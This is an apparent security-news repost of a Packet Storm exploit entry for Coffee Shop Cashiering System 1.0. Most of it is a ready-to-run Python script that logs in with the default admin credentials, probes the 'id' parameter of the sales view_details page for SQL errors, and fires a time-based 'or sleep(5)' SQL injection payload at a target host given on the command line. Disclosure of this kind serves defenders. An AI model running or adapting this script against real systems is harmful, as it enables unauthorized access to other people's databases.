Security
Headlines
HeadlinesLatestCVEs

Headline

Coffee Shop Cashiering System 1.0 SQL Injection

Coffee Shop Cashiering System version 1.0 suffers from a remote time-based SQL injection vulnerability.

Packet Storm
#sql#vulnerability#windows#php#auth
# Exploit Title: Coffee Shop Cashiering System - Authenticated Time Based Sql injection# Date: 27-06-2022# Exploit Author: syad# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cscs.zip# Version: 1.0# Tested on: Windows 10 + XAMPP 3.2.4# CVE ID : N/A# Description # The id parameter does not perform input validation on the view_detail.php file it allow authenticated Time Based SQL Injection.import requestsimport syss = requests.session()proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}def login_sql():    target = "http://%s/cscs/classes/Login.php?f=login" % sys.argv[1]    d = {        "username" : "admin",        "password" : "admin123"    }    r = s.post(target, data=d, allow_redirects=True, proxies=proxies)    res = r.text    if "success" in res:        return True    else:        return Falsedef detect_sql():    r = s.get("http://%s/cscs/admin/?page=sales/view_details&id=2'" % sys.argv[1])    res = r.text    if "You have an error in your SQL syntax;" in res:        print("[+] SQL Error Found !!")    else:        return Falsedef time_based_sql():    target = "http://%s/cscs/admin/?page=sales/view_details&id=2'+or+sleep(5)--+-" % sys.argv[1]    r = s.get(target, proxies=proxies)    print("[+] Time Based SQL Injection Executed !!!")def main():    if len(sys.argv) !=2:        print("(+) usage: %s <target>" % sys.argv[0] )        print("(+) eg: %s 192.168.121.103 " % sys.argv[0] )        sys.exit(-1)    if login_sql():        print("[+] Success Login")    detect_sql()    time_based_sql()if __name__ == "__main__":    main()

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution